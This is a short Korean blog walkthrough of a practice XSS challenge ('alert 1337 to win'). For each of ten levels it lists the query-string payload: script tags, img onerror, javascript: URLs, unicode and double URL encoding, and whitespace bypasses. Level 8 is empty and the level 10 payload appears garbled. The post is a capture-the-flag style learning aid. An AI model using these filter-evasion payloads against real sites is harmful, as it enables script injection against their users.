alert 1337 to win

2020. 9. 11. 10:48Hacking/Pentest Sites

level1

?name=<script>alert(%271337%27)</script>

 

level2

?name=<Script>alert(%271337%27)</Script>

 

level3

?name=zxm%0a<script>alert(1337)</script>

 

%0A : Line Feed

 

level4

img 태그 이용

?img=x%27%20onerror=%27alert(1377)

 

level5

?name=zxm&action=javascript:alert(1337)

 

level6

<, > 필터링 우회

?name=zxm\u003cscript\u003ealert(1337)\u003c/script\u003e

 

\u003c : 유니코드로 <
\u003e : 유니코드로 >

번역하면
?name=zxm<script>alert(1337)</script>

 

level7

double encording

?name=zxm%253cscript%253ealert%25281337%2529%253c%252fscript%253e 

'<' ----%encording---> '%3c'  ----%encording---> '%253c' 
'>' ----%encording---> '%3e'  ----%encording---> '%253e' 

 

번역하면 
?name=zxm<script>alert(1337)</script>

 

level8

 

level9

white space 우회

?name=<script%09src=data:text/javascript,alert(1337)></script>

 

[white space 우회 방법]
1) Tab : %09
2) Line Feed : %0a
3) Caraage Return : %0d
4) comment : /**/
5) parentheses : ()
6) add : +

 

번역하면

?name=<script src=data:text/javascript,alert(1337)></script>

 

level10

?name=\u003cscript\u003eeval.call\'${\u022alert\u00281337\u0029]u0022}\'\u003c/script\u003e'

 

\u003c : 유니코드로 <

\u003e : 유니코드로 >

\u0022 : "

\u0028 : (

\u0029 : )

eval() 함수 : 인자로 들어온 문자열을 코드로 인식하는 함수

 

번역하면

?name=<script>eval.call\'${"alert(1337)"}\'<script>

 

 

참고 사이트 :

scrapbox.io/kayuminbo

zixem.altervista.org/www.zixem.altervista.org/XSS/8.php?name=zxm